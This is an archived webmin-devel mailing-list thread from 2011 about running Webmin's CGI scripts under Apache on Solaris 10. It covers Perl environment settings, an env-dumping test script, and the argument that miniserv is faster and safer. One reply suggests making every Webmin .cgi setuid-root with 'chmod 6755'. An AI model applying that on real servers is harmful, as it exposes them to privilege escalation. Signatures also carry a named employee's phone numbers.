Speed is pretty much certainly not one of those benefits, security is 
definitely not one of those benefits, and "extending functionality" is 
currently a no-op in the discussion...without knowing what extended 
functionality you're looking for, I don't have anything constructive to 
say about it. ;-)

So, do I think you're wasting your time? If speed is why you're doing 
it, then you're wasting your time. Webmin won't be faster running under 
Apache (or any other web server, even the fastest web server in the 
world); it'll probably be slower (miniserv is an already running Perl 
process, removing most of the CGI spin up time from the equation). If 
security is why you're doing it, then you're wasting your time. miniserv 
provides a number of security features not found, or at least difficult 
to replicate, in Apache. There may be other good reasons to run under 
Apache (Jamie mentioned memory use, though even when I was building 
pretty memory-sensitive products, I could always find ~11MB for Webmin).

In short, define your problem clearly, and a solution might be easier to 
find.

On 3/21/2011 5:33 AM, PEOPLES, MICHAEL P (ATTSI) wrote:
> Joe,
>
> You may very well be right.  As I was writing that yesterday, I thought to myself, maybe someone with more experience than I should, metaphorically, "slap me upside the head" and tell me I'm wasting my time.
>
> That said, I wanted to see for myself, and given the fact that this is supposed to work (and my generally obsessive nature), I wanted to see for myself.
>
> I have sufficient knowledge of how Webmin and Apache work to understand that both are just serving up pages and Webmin is most certainly lighter than Apache.  What Apache would allow would be a richer tool set for extending functionality.
>
> I appreciate the time and help offered.  If folks with actual experience using Webmin under Apache feel I'm wasting mine time, don't hesitate to tell me.
>
> Thanks.
>
> Michael Peoples
> Senior Systems Manager
> AT&T - ATTSI
> Office:            614-789-8559
> Cell:    614-886-0923
> FAX:   614-789-8975
> mpe...@at...
>
> This e-mail and any files transmitted with it are AT&T property, are confidential, and are intended solely for the use of the individual or entity to whom this email is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
>
>
> -----Original Message-----
> From: Joe Cooper [mailto:jo...@vi...]
> Sent: Monday, March 21, 2011 3:28 AM
> To: web...@li...
> Subject: Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.
>
> I just read through this conversation, and it sounds like you're doing
> all of this because you believe running Webmin under Apache will be
> faster. I very strongly suspect it will be slower.
>
> On 3/20/2011 1:45 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
>> The only way I know how to do this is via the suexec option in Apache.  This version of Apache (2.2.16) was not compiled with that option and attempts to do so have repeatedly failed (for some reason it doesn't like the OpenSSL install despite the fact that it is already using it (--with-ssl).
>>
>> Running Apache as root is strongly discouraged, so what I'm asking is, do you have a way to do this that doesn't involve recompiling Apache to include suexec or running Apache under root?
> ...
>
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel
>
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel


------------------------------------------------------------------------------
Enable your software for Intel(R) Active Management Technology to meet the
growing manageability and security demands of your customers. Businesses
are taking advantage of Intel(R) vPro (TM) technology - will your software 
be a part of the solution? Download the Intel(R) Manageability Checker 
today! http://p.sf.net/sfu/intel-dev2devmar
-
Forwarded by the Webmin development list at web...@we...
To remove yourself from this list, go to
http://lists.sourceforge.net/lists/listinfo/webadmin-devel

Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.

[Joe C. <jo...@vi...>]

It would work if you can convince Apache to run CGIs as root...but the 
Apache folks go to great lengths to make that difficult to do, because 
of the horrendous security implications and the burden of auditing that 
much code. I've done it in the distant past, in pre-Webmin days, but 
have no recollection of how I did it, and suspect it would be very 
different today (I'm pretty sure suexec didn't exist back then, for 
instance). Webmin's miniserv.pl, by comparison, is miniscule, and 
written in a much higher level language with none of the common security 
concerns found in C code, where the program manages its own memory.

I question this assertion, as well: "What Apache would allow would be a 
richer tool set for extending functionality."

What specific functionality did you have in mind? miniserv.pl is written 
in Perl, and thus extremely easy to extend (though I'm always leery of 
touching the security-sensitive portions of Webmin, and miniserv is 
perhaps the most security-sensitive part of the whole package). I'm not 
saying Apache isn't a richer toolset...I'm just not sure how most of its 
tools would apply to Webmin.

Perhaps you can tell us what you're trying to accomplish, and we can 
lend some advice on those specific goals...maybe Apache will provide 
benefits for your particular case, but I'm currently doubtful of that. 
Speed is pretty much certainly not one of those benefits, security is 
definitely not one of those benefits, and "extending functionality" is 
currently a no-op in the discussion...without knowing what extended 
functionality you're looking for, I don't have anything constructive to 
say about it. ;-)

So, do I think you're wasting your time? If speed is why you're doing 
it, then you're wasting your time. Webmin won't be faster running under 
Apache (or any other web server, even the fastest web server in the 
world); it'll probably be slower (miniserv is an already running Perl 
process, removing most of the CGI spin up time from the equation). If 
security is why you're doing it, then you're wasting your time. miniserv 
provides a number of security features not found, or at least difficult 
to replicate, in Apache. There may be other good reasons to run under 
Apache (Jamie mentioned memory use, though even when I was building 
pretty memory-sensitive products, I could always find ~11MB for Webmin).

In short, define your problem clearly, and a solution might be easier to 
find.

On 3/21/2011 5:33 AM, PEOPLES, MICHAEL P (ATTSI) wrote:
> Joe,
>
> You may very well be right.  As I was writing that yesterday, I thought to myself, maybe someone with more experience than I should, metaphorically, "slap me upside the head" and tell me I'm wasting my time.
>
> That said, I wanted to see for myself, and given the fact that this is supposed to work (and my generally obsessive nature), I wanted to see for myself.
>
> I have sufficient knowledge of how Webmin and Apache work to understand that both are just serving up pages and Webmin is most certainly lighter than Apache.  What Apache would allow would be a richer tool set for extending functionality.
>
> I appreciate the time and help offered.  If folks with actual experience using Webmin under Apache feel I'm wasting mine time, don't hesitate to tell me.
>
> Thanks.
>
> Michael Peoples
> Senior Systems Manager
> AT&T - ATTSI
> Office:            614-789-8559
> Cell:    614-886-0923
> FAX:   614-789-8975
> mpe...@at...
>
> This e-mail and any files transmitted with it are AT&T property, are confidential, and are intended solely for the use of the individual or entity to whom this email is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
>
>
> -----Original Message-----
> From: Joe Cooper [mailto:jo...@vi...]
> Sent: Monday, March 21, 2011 3:28 AM
> To: web...@li...
> Subject: Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.
>
> I just read through this conversation, and it sounds like you're doing
> all of this because you believe running Webmin under Apache will be
> faster. I very strongly suspect it will be slower.
>
> On 3/20/2011 1:45 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
>> The only way I know how to do this is via the suexec option in Apache.  This version of Apache (2.2.16) was not compiled with that option and attempts to do so have repeatedly failed (for some reason it doesn't like the OpenSSL install despite the fact that it is already using it (--with-ssl).
>>
>> Running Apache as root is strongly discouraged, so what I'm asking is, do you have a way to do this that doesn't involve recompiling Apache to include suexec or running Apache under root?
> ...
>
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel
>
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel

Re: [webmin-devel] CORRECTION - PROBLEM NOTSOLVEDRE:Stumbling Forward RE: GettingWebmin torununderApacheforSolaris10-- Creating dent in deskfrom banging head.

[PEOPLES, M. P (ATTSI) <mp...@at...>]

I'll accept your recommendation and move on until I can recompile Apache.  I would like actual performance data at some point and will share it when, and if, I can get it.

I will also share my notes on setting up Apache and webmin, that might add to existing documentation.

Michael Peoples
Senior Systems Manager
AT&T - ATTSI
Office:            614-789-8559
Cell:    614-886-0923
FAX:   614-789-8975
mpe...@at...

This e-mail and any files transmitted with it are AT&T property, are confidential, and are intended solely for the use of the individual or entity to whom this email is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."


-----Original Message-----
From: Jamie Cameron [mailto:jca...@we...] 
Sent: Monday, March 21, 2011 2:55 PM
To: Webmin development list
Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOTSOLVEDRE:Stumbling Forward RE: GettingWebmin torununderApacheforSolaris10-- Creating dent in deskfrom banging head.

I haven't done any actual performance tests, but based on my knowledge of webmin's
code and Apache's I can't see how running it under Apache is likely to be faster .. 
except maybe for serving static files, which aren't the main bottleneck anyway.

Those very few users who do run Webmin under Apache do it because they want to
reduce the memory footprint, or because they can't use port 10000. In the latter case
the proxy method that is in the documentation works better, as Webmin is still running
the CGI scripts.

 - Jamie

On 21/Mar/2011 05:33 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> Joe,
> 
> You may very well be right.  As I was writing that yesterday, I thought to myself,
> maybe someone with more experience than I should, metaphorically, "slap me upside
> the head" and tell me I'm wasting my time.
> 
> That said, I wanted to see for myself, and given the fact that this is supposed
> to work (and my generally obsessive nature), I wanted to see for myself.  
> 
> I have sufficient knowledge of how Webmin and Apache work to understand that both
> are just serving up pages and Webmin is most certainly lighter than Apache.  What
> Apache would allow would be a richer tool set for extending functionality.
> 
> I appreciate the time and help offered.  If folks with actual experience using
> Webmin under Apache feel I'm wasting mine time, don't hesitate to tell me.
> 
> Thanks.
> 
> Michael Peoples
> Senior Systems Manager
> AT&T - ATTSI
> Office:            614-789-8559
> Cell:    614-886-0923
> FAX:   614-789-8975
> mpe...@at...
> 
> This e-mail and any files transmitted with it are AT&T property, are confidential,
> and are intended solely for the use of the individual or entity to whom this email
> is addressed. If you are not one of the named recipient(s) or otherwise have reason
> to believe that you have received this message in error, please notify the sender
> and delete this message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> 
> 
> -----Original Message-----
> From: Joe Cooper [mailto:jo...@vi...] 
> Sent: Monday, March 21, 2011 3:28 AM
> To: web...@li...
> Subject: Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward
> RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging
> head.
> 
> I just read through this conversation, and it sounds like you're doing 
> all of this because you believe running Webmin under Apache will be 
> faster. I very strongly suspect it will be slower.
> 
> On 3/20/2011 1:45 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
> > The only way I know how to do this is via the suexec option in Apache.  This
> version of Apache (2.2.16) was not compiled with that option and attempts to do
> so have repeatedly failed (for some reason it doesn't like the OpenSSL install
> despite the fact that it is already using it (--with-ssl).
> >
> > Running Apache as root is strongly discouraged, so what I'm asking is, do you
> have a way to do this that doesn't involve recompiling Apache to include suexec
> or running Apache under root?
> ...
> 
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> 
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel

Re: [webmin-devel] CORRECTION - PROBLEM NOTSOLVEDRE:Stumbling Forward RE: GettingWebmin torununderApacheforSolaris10-- Creating dent in deskfrom banging head.

[Jamie C. <jca...@we...>]

I haven't done any actual performance tests, but based on my knowledge of webmin's
code and Apache's I can't see how running it under Apache is likely to be faster .. 
except maybe for serving static files, which aren't the main bottleneck anyway.

Those very few users who do run Webmin under Apache do it because they want to
reduce the memory footprint, or because they can't use port 10000. In the latter case
the proxy method that is in the documentation works better, as Webmin is still running
the CGI scripts.

 - Jamie

On 21/Mar/2011 05:33 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> Joe,
> 
> You may very well be right.  As I was writing that yesterday, I thought to myself,
> maybe someone with more experience than I should, metaphorically, "slap me upside
> the head" and tell me I'm wasting my time.
> 
> That said, I wanted to see for myself, and given the fact that this is supposed
> to work (and my generally obsessive nature), I wanted to see for myself.  
> 
> I have sufficient knowledge of how Webmin and Apache work to understand that both
> are just serving up pages and Webmin is most certainly lighter than Apache.  What
> Apache would allow would be a richer tool set for extending functionality.
> 
> I appreciate the time and help offered.  If folks with actual experience using
> Webmin under Apache feel I'm wasting mine time, don't hesitate to tell me.
> 
> Thanks.
> 
> Michael Peoples
> Senior Systems Manager
> AT&T - ATTSI
> Office:            614-789-8559
> Cell:    614-886-0923
> FAX:   614-789-8975
> mpe...@at...
> 
> This e-mail and any files transmitted with it are AT&T property, are confidential,
> and are intended solely for the use of the individual or entity to whom this email
> is addressed. If you are not one of the named recipient(s) or otherwise have reason
> to believe that you have received this message in error, please notify the sender
> and delete this message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> 
> 
> -----Original Message-----
> From: Joe Cooper [mailto:jo...@vi...] 
> Sent: Monday, March 21, 2011 3:28 AM
> To: web...@li...
> Subject: Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward
> RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging
> head.
> 
> I just read through this conversation, and it sounds like you're doing 
> all of this because you believe running Webmin under Apache will be 
> faster. I very strongly suspect it will be slower.
> 
> On 3/20/2011 1:45 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
> > The only way I know how to do this is via the suexec option in Apache.  This
> version of Apache (2.2.16) was not compiled with that option and attempts to do
> so have repeatedly failed (for some reason it doesn't like the OpenSSL install
> despite the fact that it is already using it (--with-ssl).
> >
> > Running Apache as root is strongly discouraged, so what I'm asking is, do you
> have a way to do this that doesn't involve recompiling Apache to include suexec
> or running Apache under root?
> ...
> 
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel
> 
> ------------------------------------------------------------------------------
> Colocation vs. Managed Hosting
> A question and answer guide to determining the best fit
> for your organization - today and in the future.
> http://p.sf.net/sfu/internap-sfd2d
> -
> Forwarded by the Webmin development list at web...@we...
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel

Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.

[PEOPLES, M. P (ATTSI) <mp...@at...>]

Joe,

You may very well be right.  As I was writing that yesterday, I thought to myself, maybe someone with more experience than I should, metaphorically, "slap me upside the head" and tell me I'm wasting my time.

That said, I wanted to see for myself, and given the fact that this is supposed to work (and my generally obsessive nature), I wanted to see for myself.  

I have sufficient knowledge of how Webmin and Apache work to understand that both are just serving up pages and Webmin is most certainly lighter than Apache.  What Apache would allow would be a richer tool set for extending functionality.

I appreciate the time and help offered.  If folks with actual experience using Webmin under Apache feel I'm wasting mine time, don't hesitate to tell me.

Thanks.

Michael Peoples
Senior Systems Manager
AT&T - ATTSI
Office:            614-789-8559
Cell:    614-886-0923
FAX:   614-789-8975
mpe...@at...

This e-mail and any files transmitted with it are AT&T property, are confidential, and are intended solely for the use of the individual or entity to whom this email is addressed. If you are not one of the named recipient(s) or otherwise have reason to believe that you have received this message in error, please notify the sender and delete this message immediately from your computer. Any other use, retention, dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."


-----Original Message-----
From: Joe Cooper [mailto:jo...@vi...] 
Sent: Monday, March 21, 2011 3:28 AM
To: web...@li...
Subject: Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.

I just read through this conversation, and it sounds like you're doing 
all of this because you believe running Webmin under Apache will be 
faster. I very strongly suspect it will be slower.

On 3/20/2011 1:45 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
> The only way I know how to do this is via the suexec option in Apache.  This version of Apache (2.2.16) was not compiled with that option and attempts to do so have repeatedly failed (for some reason it doesn't like the OpenSSL install despite the fact that it is already using it (--with-ssl).
>
> Running Apache as root is strongly discouraged, so what I'm asking is, do you have a way to do this that doesn't involve recompiling Apache to include suexec or running Apache under root?
...

------------------------------------------------------------------------------
Colocation vs. Managed Hosting
A question and answer guide to determining the best fit
for your organization - today and in the future.
http://p.sf.net/sfu/internap-sfd2d
-
Forwarded by the Webmin development list at web...@we...
To remove yourself from this list, go to
http://lists.sourceforge.net/lists/listinfo/webadmin-devel

Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:Stumbling Forward RE: Getting Webmin torununderApacheforSolaris10-- Creating dent in desk from banging head.

[Joe C. <jo...@vi...>]

I just read through this conversation, and it sounds like you're doing 
all of this because you believe running Webmin under Apache will be 
faster. I very strongly suspect it will be slower.

On 3/20/2011 1:45 PM, PEOPLES, MICHAEL P (ATTSI) wrote:
> The only way I know how to do this is via the suexec option in Apache.  This version of Apache (2.2.16) was not compiled with that option and attempts to do so have repeatedly failed (for some reason it doesn't like the OpenSSL install despite the fact that it is already using it (--with-ssl).
>
> Running Apache as root is strongly discouraged, so what I'm asking is, do you have a way to do this that doesn't involve recompiling Apache to include suexec or running Apache under root?
...

Re: [webmin-devel] CORRECTION - PROBLEM NOT SOLVEDRE:StumblingForward RE: Getting WebmintorununderApacheforSolaris10-- Creating dent in desk frombanging head.

[Jamie C. <jca...@we...>]

Yeah, getting Apache to run CGI scripts as root is non-trivial ..

However, one method that has worked for me in the past is to make all the Webmin
.cgi scripts setuid-root. Usually the commands for this are like :

chown root *.cgi
chmod 6755 *.cgi

 - Jamie

On 20/Mar/2011 13:45 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> The only way I know how to do this is via the suexec option in Apache.  This version
> of Apache (2.2.16) was not compiled with that option and attempts to do so have
> repeatedly failed (for some reason it doesn't like the OpenSSL install despite
> the fact that it is already using it (--with-ssl).
> 
> Running Apache as root is strongly discouraged, so what I'm asking is, do you have
> a way to do this that doesn't involve recompiling Apache to include suexec or running
> Apache under root?
> 
> If not, I guess I'll have to get this to compile with suexec.
> 
> I did notice some suexec related code within Webmin and was hoping that I could
> use Webmin to configure Apache, stop Webmin, and restart Apache with the new configuration.
> I haven't found a reference to mod_suexec_directives in the webmin/apache directory
> anywhere, so I can't figure out where to access it.  I thought it might be because
> suexec wasn't compiled into Apache, but that would prevent it being referenced
> in some module.
> 
> Michael Peoples
> Senior Systems Manager
> AT&T - ATTSI
> Office:            614-789-8559
> Cell:    614-886-0923
> FAX:   614-789-8975
> mpe...@at...
> 
> This e-mail and any files transmitted with it are AT&T property, are confidential,
> and are intended solely for the use of the individual or entity to whom this email
> is addressed. If you are not one of the named recipient(s) or otherwise have reason
> to believe that you have received this message in error, please notify the sender
> and delete this message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> 
> -----Original Message-----
> From: Jamie Cameron [mailto:jca...@we...] 
> Sent: Friday, March 18, 2011 10:05 PM
> To: Webmin development list
> Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVEDRE:StumblingForward RE:
> Getting Webmin torununderApacheforSolaris10-- Creating dent in desk frombanging
> head.
> 
> If you run index.cgi from the command line as root, make sure you run it using
> the file path, like /opt/webmin/index.cgi .
> 
> If it is run by Apache, it needs to be run as root - or else the scripts won't
> have permissions do actually do anything.
> 
>  - Jamie
> 
> On 18/Mar/2011 15:27 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > (Sorry for the potential duplicate, I flipped the last one to HTML and it got
> quarantined
> > on the mail server).
> > 
> > Firstly, this feels an awful like when I tried to run modules from the command
> > line.  I was on an environment variable and "require" merry-go-round that was
> frustrating.
> > 
> > I also want to mention that Apache is running under user 'apache', not 'root',
> > if that's relevant.
> > 
> > ============================================================================================
> > 
> > I tried executing the index.cgi script as user 'apache' after executing the following:
> > 
> > PERLLIB="/opt/webmin"; export PERLLIB
> > WEBMIN_CONFIG="/etc/webmin" ; export WEBMIN_CONFIG
> > WEBMIN_VAR="/var/webmin" ; export WEBMIN_VAR
> > SERVER_ROOT="/opt/webmin" ; export SERVER_ROOT
> > MINISERV_CONFIG="/etc/webmin/miniserv.conf" ; export MINISERV_CONFIG
> > 
> > I got the same error: Undefined subroutine &WebminCore::init_config called at
> /dev/fd/3
> > line 7
> > 
> > ============================================================================================
> > 
> > I then executed the index.cgi script as user 'root' after executing the following:
> > 
> > PERLLIB="/opt/webmin"; export PERLLIB
> > WEBMIN_CONFIG="/etc/webmin" ; export WEBMIN_CONFIG
> > WEBMIN_VAR="/var/webmin" ; export WEBMIN_VAR
> > SERVER_ROOT="/opt/webmin" ; export SERVER_ROOT
> > MINISERV_CONFIG="/etc/webmin/miniserv.conf" ; export MINISERV_CONFIG
> > 
> > I got a different error message unrelated to the error above, most likely thrown
> > by the web-lib-funcs.pl:
> > 
> > Error: Script was not run with full path (failed to find ./index.cgi under /opt/webmin)
> > JJ
> > -----
> > Script was not run with full path (failed to find ./index.cgi under /opt/webmin)
> > -----
> > 
> > ============================================================================================
> > 
> > I shut down miniserv.pl, changed the Apache config, and restarted Apache cleanly.
> > Apache was listening on port 10000.
> > 
> > I pointed my web browser at https://dubsol10.apt.att.com:10000/test.cgi.
> > 
> > A dialog box popped up asking for my user name and password.  I supplied that
> an
> > the browser displayed the following.  Some data was removed and replaced with
> a
> > <data> placeholder.  If it is relevant to anyone's analysis, I'll try to provide
> > it.
> > 
> > ============================================================================================
> > 
> > uid=7788(apache) gid=8777(apache) groups=8777(apache),7000(nobody)
> > AUTH_TYPE=Basic
> > DOCUMENT_ROOT=/opt/webmin
> > GATEWAY_INTERFACE=CGI/1.1
> > HTTPS=on
> > HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7
> > HTTP_ACCEPT_ENCODING=gzip,deflate
> > HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
> > HTTP_CONNECTION=keep-alive
> > HTTP_COOKIE=<data>
> > HTTP_HOST=dubsol10.apt.att.com:10000
> > HTTP_KEEP_ALIVE=115
> > HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13)
> Gecko/20101203
> > Firefox/3.6.13
> > MINISERV_CONFIG=/etc/webmin/miniserv.conf
> > PATH=/usr/local/bin:/usr/sbin:/usr/bin:/usr/sfw/bin:/usr/local/sbin:/usr/ccs/bin:
> > PERL5LIB=
> > PERLLIB=/opt/webmin
> > QUERY_STRING=
> > REMOTE_ADDR=<data>
> > REMOTE_PORT=<data>
> > REMOTE_USER=root
> > REQUEST_METHOD=GET
> > REQUEST_URI=/test.cgi
> > SCRIPT_FILENAME=/opt/webmin/test.cgi
> > SCRIPT_NAME=/test.cgi
> > SERVER_ADDR=<data>
> > SERVER_ADMIN=mp...@at...
> > SERVER_NAME=dubsol10.apt.att.com
> > SERVER_PORT=10000
> > SERVER_PROTOCOL=HTTP/1.1
> > SERVER_ROOT=/opt/webmin
> > SERVER_SIGNATURE=
> > SERVER_SOFTWARE=Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7d PHP/5.3.3
> > SSL_CIPHER=<data>
> > SSL_CIPHER_ALGKEYSIZE=<data>
> > SSL_CIPHER_EXPORT=false
> > SSL_CIPHER_USEKEYSIZE=<data>
> > SSL_CLIENT_VERIFY=<data>
> > SSL_COMPRESS_METHOD=<data>
> > SSL_PROTOCOL=<data>
> > SSL_SECURE_RENEG=<data>
> > SSL_SERVER_A_KEY=<data>
> > SSL_SERVER_A_SIG=<data>
> > SSL_SERVER_I_DN=<data>
> > SSL_SERVER_I_DN_C=US
> > SSL_SERVER_I_DN_CN=VeriSign Class 3 Secure Server CA - G3
> > SSL_SERVER_I_DN_O=VeriSign, Inc.
> > SSL_SERVER_I_DN_OU=VeriSign Trust Network
> > SSL_SERVER_I_DN_OU_1=Terms of use at https://www.verisign.com/rpa (c)10
> > SSL_SERVER_M_SERIAL=<data>
> > SSL_SERVER_M_VERSION=3
> > SSL_SERVER_S_DN=<data>
> > SSL_SERVER_S_DN_C=US
> > SSL_SERVER_S_DN_CN=dubsol10.apt.att.com
> > SSL_SERVER_S_DN_L=<data>
> > SSL_SERVER_S_DN_O=<data>
> > SSL_SERVER_S_DN_OU=<data>
> > SSL_SERVER_S_DN_ST=<data>
> > SSL_SERVER_V_END=Feb  1 23:59:59 2012 GMT
> > SSL_SERVER_V_START=Feb  1 00:00:00 2011 GMT
> > SSL_SESSION_ID=<data>
> > SSL_VERSION_INTERFACE=mod_ssl/2.2.16
> > SSL_VERSION_LIBRARY=OpenSSL/0.9.7d
> > TZ=US/Eastern
> > UNIQUE_ID=<data>
> > WEBMIN_CONFIG=/etc/webmin
> > WEBMIN_VAR=/var/webmin
> > 
> > ============================================================================================
> > 
> > Based upon all of the above, this all but has to be a permissions issue
> > 
> > Thanks again and have a great weekend!
> > 
> > Michael Peoples
> > Senior Systems Manager
> > AT&T - ATTSI
> > Office:            614-789-8559
> > Cell:    614-886-0923
> > FAX:   614-789-8975
> > mpe...@at...
> > 
> > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > and are intended solely for the use of the individual or entity to whom this
> email
> > is addressed. If you are not one of the named recipient(s) or otherwise have
> reason
> > to believe that you have received this message in error, please notify the sender
> > and delete this message immediately from your computer. Any other use, retention,
> > dissemination, forwarding, printing, or copying of this e-mail is strictly prohibited."
> > 
> > 
> > -----Original Message-----
> > From: Jamie Cameron [mailto:jca...@we...] 
> > Sent: Friday, March 18, 2011 5:00 PM
> > To: Webmin development list
> > Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVED RE:StumblingForward
> > RE: Getting Webmin to rununderApacheforSolaris10-- Creating dent in desk from
> banging
> > head.
> > 
> > One thing to check is if CGI scripts are being executed by Apache properly
> > and with the correct permissions. Try putting a file named test.cgi in the 
> > Webmin root directory (/opt/webmin) , and then accessing it in your browser.
> > The script should contain :
> > 
> > #!/bin/sh
> > echo Content-type: text/plain
> > echo ""
> > id -a
> > env
> > 
> > And then post the output here.
> > 
> >  - Jamie
> > 
> > On 17/Mar/2011 17:30 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > No luck with just the PERLLIB setting.  PERL5LIB is set in the default environment,
> > > so it is most likely still "active".  Would that make a difference? I suppose
> > it
> > > probably would if webmin can't find the proper Perl.
> > > 
> > > It tried the following in both files to "suppress" the PERL5LIB value:
> > > 
> > > SetEnv PER5LIB ""
> > > 
> > > But it still failed.
> > > 
> > > Does anyone need to see something in particular to help me here?  I'll provide
> > > what I can.
> > > 
> > > Michael Peoples
> > > Senior Systems Manager
> > > AT&T - ATTSI
> > > Office:            614-789-8559
> > > Cell:    614-886-0923
> > > FAX:   614-789-8975
> > > mpe...@at...
> > > 
> > > This e-mail and any files transmitted with it are AT&T property, are confidential,
> > > and are intended solely for the use of the individual or entity to whom this
> > email
> > > is addressed. If you are not one of the named recipient(s) or otherwise have
> > reason
> > > to believe that you have received this message in error, please notify the
> sender
> > > and delete this message immediately from your computer. Any other use, retention,
> > > dissemination, forwarding, printing, or copying of this e-mail is strictly
> prohibited."
> > > 
> > > 
> > > -----Original Message-----
> > > From: Jamie Cameron [mailto:jca...@we...] 
> > > Sent: Thursday, March 17, 2011 2:22 PM
> > > To: Webmin development list
> > > Subject: Re: [webmin-devel]CORRECTION - PROBLEM NOT SOLVED RE: StumblingForward
> > > RE: Getting Webmin to rununderApache forSolaris10-- Creating dent in desk from
> > > banging head.
> > > 
> > > Are you sure you want to set PERL5LIB as well? That might be overriding PERLLIB
> > > , which
> > > is set correctly.
> > > 
> > > On 17/Mar/2011 06:31 PEOPLES, MICHAEL P (ATTSI) <mp...@at...> wrote ..
> > > > I jumped the gun on this one.  My browser auto-filled another server with
> a
> > similar
> > > > name, and I failed to notice.  
> > > > 
> > > > The original problem still exists, with the same error messages as before.
> > > > 
> > > > I placed the following lines in both the main httpd.conf file and the virtual
> > > server
> > > > definition file.
> > > > 
> > > > SetEnv PERL5LIB "/usr/local/lib/perl5"
> > > > SetEnv PERLLIB "/opt/webmin"
> > > > 
> > > > What else might I try?
> > > > 
> > > > Michael Peoples
> > > > Senior Systems Manager
> > > > AT&T - ATTSI
> > > > Office:            614-789-8559
> > > > Cell:    614-886-0923
> > > > FAX:   614-789-8975
> > > > mpe...@at...
> > > > 
> > > > This e-mail and any files transmitted with it are AT&T property, are confidential,
